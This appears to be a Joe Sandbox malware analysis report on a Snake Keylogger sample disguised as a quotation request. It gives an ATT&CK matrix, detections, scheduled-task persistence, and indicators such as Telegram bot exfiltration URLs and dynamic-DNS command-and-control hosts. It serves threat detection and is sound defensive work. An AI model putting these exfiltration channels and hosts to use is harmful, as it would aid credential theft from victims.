Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Scheduled Task/Job	12 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 File Deletion	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	31 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	111 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	53%	ReversingLabs	Win32.Spyware.Snakekeylogger
Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	53%	ReversingLabs	Win32.Spyware.Snakekeylogger

Name	IP	Active	Malicious	Reputation
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false	high
reallyfreegeoip.org	188.114.97.3	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	193.122.6.168	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://reallyfreegeoip.org/xml/8.46.123.75	false	high
http://checkip.dyndns.org/	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:971342%0D%0ADate%20and%20Time:%2022/11/2024%20/%2014:24:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20971342%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:971342%0D%0ADate%20and%20Time:%2022/11/2024%20/%2011:49:50%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20971342%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://www.office.com/	NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002A0F000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002A00000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/chrome_newtab	Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.0000000004373000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003841000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/ac/?q=	Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.0000000004373000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003841000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org	Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002903000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.0000000004373000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003841000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot	Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002903000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org/C5	Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3841092416.00000000069A3000.00000004.00000020.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:971342%0D%0ADate%20a	Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002903000.00000004.00000800.00020000.00000000.sdmp	false	high
http://tempuri.org/ianiDataSet2.xsdM	Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, NuDUTBObHpKADz.exe.0.dr	false	high
https://www.office.com/lB	Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.0000000003278000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002A0A000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.0000000004373000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003841000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org	Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002821000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.0000000004373000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003841000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002903000.00000004.00000800.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=en	NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.00000000029DE000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002A0F000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.00000000029CF000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.ecosia.org/newtab/	Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.0000000004373000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003841000.00000004.00000800.00020000.00000000.sdmp	false	high
http://varders.kozow.com:8081	Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002821000.00000004.00000800.00020000.00000000.sdmp	false	high
http://tempuri.org/ianiDataSet.xsd	Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, NuDUTBObHpKADz.exe.0.dr	false	high
http://aborters.duckdns.org:8081	Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002821000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ac.ecosia.org/autocomplete?q=	Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.0000000004373000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003841000.00000004.00000800.00020000.00000000.sdmp	false	high
http://tempuri.org/ianiDataSet1.xsd	Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, NuDUTBObHpKADz.exe.0.dr	false	high
https://www.office.com/0	Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.000000000326E000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anotherarmy.dns.army:8081	Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002821000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/8.46.123.75$	Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.000000000314A000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.000000000318F000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002903000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.00000000028DD000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002898000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.0000000004373000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003841000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org/q	Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=enlB	Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.0000000003247000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.00000000029D9000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org	Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.0000000003120000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.000000000318F000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002903000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.00000000028DD000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.000000000286E000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1415188848.000000000310A000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000A.00000002.1469660734.0000000002FDA000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002821000.00000004.00000800.00020000.00000000.sdmp	false	high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.0000000004373000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003841000.00000004.00000800.00020000.00000000.sdmp	false	high
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/	Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.0000000003120000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.000000000286E000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
188.114.97.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	false
193.122.6.168	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1560113
Start date and time:	2024-11-21 12:19:11 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 46s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@20/25@3/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 245 Number of non-executed functions: 7
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe

Simulations

Behavior and APIs

Time	Type	Description
06:20:06	API Interceptor	7537037x Sleep call for process: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe modified
06:20:09	API Interceptor	33x Sleep call for process: powershell.exe modified
06:20:12	API Interceptor	5240598x Sleep call for process: NuDUTBObHpKADz.exe modified
11:20:11	Task Scheduler	Run new task: NuDUTBObHpKADz path: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	Wire slip account payable.pif.exe	Get hash	malicious	AgentTesla	Browse
	Order requirements CIF Greece_pdf.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	ORDER 20240986 OA.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	Documents.pdf.exe	Get hash	malicious	MassLogger RAT	Browse
	DEVIS_VALIDE.js	Get hash	malicious	XWorm	Browse
	PayeeAdvice_HK54912_R0038704_37504.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	GST DRC-01A - DIN-20230359XL050081843E_msg.exe	Get hash	malicious	GuLoader	Browse
	Quote document and order list.exe	Get hash	malicious	GuLoader	Browse
	new order #738833.exe	Get hash	malicious	GuLoader	Browse
	FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
188.114.97.3	RFQ 3100185 MAHAD.exe	Get hash	malicious	FormBook	Browse	www.rgenerousrs.store/o362/
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	www.beylikduzu616161.xyz/2nga/
	Delivery_Notification_00000260791.doc.js	Get hash	malicious	Unknown	Browse	radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
	ce.vbs	Get hash	malicious	Unknown	Browse	paste.ee/d/lxvbq
	Label_00000852555.doc.js	Get hash	malicious	Unknown	Browse	tamilandth.com/counter/?ad=1GNktTwWR98eDEMovFNDqyUPsyEdCxKRzC&id=LWkA9pJQhl9uXU1kaDN-eSC-55GNxzVDsLXZhtXL8Pr1j1FTCf4XAYGxA0VCjCQra2XwotFrDHGSYxM&rnd=25
	PO 20495088.exe	Get hash	malicious	FormBook	Browse	www.ssrnoremt-rise.sbs/3jsc/
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/zWkbOqX7/download
	http://kklk16.bsyo45ksda.top	Get hash	malicious	Unknown	Browse	kklk16.bsyo45ksda.top/favicon.ico
	gusetup.exe	Get hash	malicious	Unknown	Browse	www.glarysoft.com/update/glary-utilities/pro/pro50/
	Online Interview Scheduling Form.lnk	Get hash	malicious	Ducktail	Browse	gmtagency.online/api/check

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	New_Order_PO-NG57283H9.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	Order requirements CIF Greece_pdf.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	z1MB267382625AE.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	ORDER 20240986 OA.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	STAFF RECORD_pdf.arj.exe	Get hash	malicious	Unknown	Browse	104.21.67.152
	REQUEST SCHL-30112023-M1 Quotation_1033855_pdf.exe	Get hash	malicious	GuLoader	Browse	104.21.67.152
	STAFF RECORD_pdf.arj.exe	Get hash	malicious	Unknown	Browse	172.67.177.134
	Documents.pdf.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	PayeeAdvice_HK54912_R0038704_37504.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	GST DRC-01A - DIN-20230359XL050081843E_msg.exe	Get hash	malicious	GuLoader	Browse	188.114.96.3
s-part-0017.t-0009.t-msedge.net	APPENDIX FORM_N#U00b045013-20241120.com.exe	Get hash	malicious	Remcos, GuLoader	Browse	13.107.246.45
	file.exe	Get hash	malicious	LummaC	Browse	13.107.246.45
	Payslip-21 November, 2024 ZmPQwjYq1NGSTsWga2.htm	Get hash	malicious	BlackHacker JS Obfuscator	Browse	13.107.246.45
	phish_alert_sp2_2.0.0.0.eml	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	file.exe	Get hash	malicious	LummaC	Browse	13.107.246.45
	CB1.exe	Get hash	malicious	BlackMoon	Browse	13.107.246.45
	+11375 Caller left Vc MsG 8b1538917f01661e6746a0528d545dbeac3b40a5- 73945.msg	Get hash	malicious	HtmlDropper	Browse	13.107.246.45
	file.exe	Get hash	malicious	LummaC	Browse	13.107.246.45
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	13.107.246.45
	file.exe	Get hash	malicious	LummaC	Browse	13.107.246.45
api.telegram.org	Wire slip account payable.pif.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	Order requirements CIF Greece_pdf.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	ORDER 20240986 OA.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Documents.pdf.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	DEVIS_VALIDE.js	Get hash	malicious	XWorm	Browse	149.154.167.220
	PayeeAdvice_HK54912_R0038704_37504.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	GST DRC-01A - DIN-20230359XL050081843E_msg.exe	Get hash	malicious	GuLoader	Browse	149.154.167.220
	Quote document and order list.exe	Get hash	malicious	GuLoader	Browse	149.154.167.220
	new order #738833.exe	Get hash	malicious	GuLoader	Browse	149.154.167.220
	FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ORACLE-BMC-31898US	New_Order_PO-NG57283H9.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	ORDER 20240986 OA.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	http://interpro.wisc.edu/courses/maintaining-asphalt-pavements/?utm_source=Brochure&utm_medium=postal&utm_campaign=D487&utm_term=SHB&utm_content=Sep	Get hash	malicious	Unknown	Browse	147.154.51.84
	Documents.pdf.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	GST DRC-01A - DIN-20230359XL050081843E_msg.exe	Get hash	malicious	GuLoader	Browse	193.122.6.168
	Quote document and order list.exe	Get hash	malicious	GuLoader	Browse	158.101.44.242
	FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.130.0
	BOQ and Full Specification.exe	Get hash	malicious	GuLoader	Browse	193.122.6.168
	Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
TELEGRAMRU	Wire slip account payable.pif.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	Order requirements CIF Greece_pdf.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	ORDER 20240986 OA.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	eddzD2MA12.exe	Get hash	malicious	Stealc, Vidar	Browse	149.154.167.99
	Documents.pdf.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	DEVIS_VALIDE.js	Get hash	malicious	XWorm	Browse	149.154.167.220
	PayeeAdvice_HK54912_R0038704_37504.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	GST DRC-01A - DIN-20230359XL050081843E_msg.exe	Get hash	malicious	GuLoader	Browse	149.154.167.220
	Quote document and order list.exe	Get hash	malicious	GuLoader	Browse	149.154.167.220
	new order #738833.exe	Get hash	malicious	GuLoader	Browse	149.154.167.220
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Payslip-21 November, 2024 ZmPQwjYq1NGSTsWga2.htm	Get hash	malicious	BlackHacker JS Obfuscator	Browse	104.17.25.14
	phish_alert_sp2_2.0.0.0.eml	Get hash	malicious	HTMLPhisher	Browse	1.1.1.1
	CHARIKLIA JUNIOR DETAILS.pdf.scr.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	wE1inOhJA5.msi	Get hash	malicious	Remcos, RHADAMANTHYS	Browse	172.64.41.3
	New_Order_PO-NG57283H9.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	https://url.uk.m.mimecastprotect.com/s/1u4eCqxlyukZk7ltZfxHE-ELz?domain=andy-25.simvoly.com	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	MDE_File_Sample_37ce4d95fd579c36340b1d1490e2ef7623af4bb3.zip	Get hash	malicious	LummaC	Browse	188.114.96.3
	http://newvideozones.click	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	New_Order_PO-NG57283H9.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	Order requirements CIF Greece_pdf.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	z1MB267382625AE.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	ORDER 20240986 OA.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
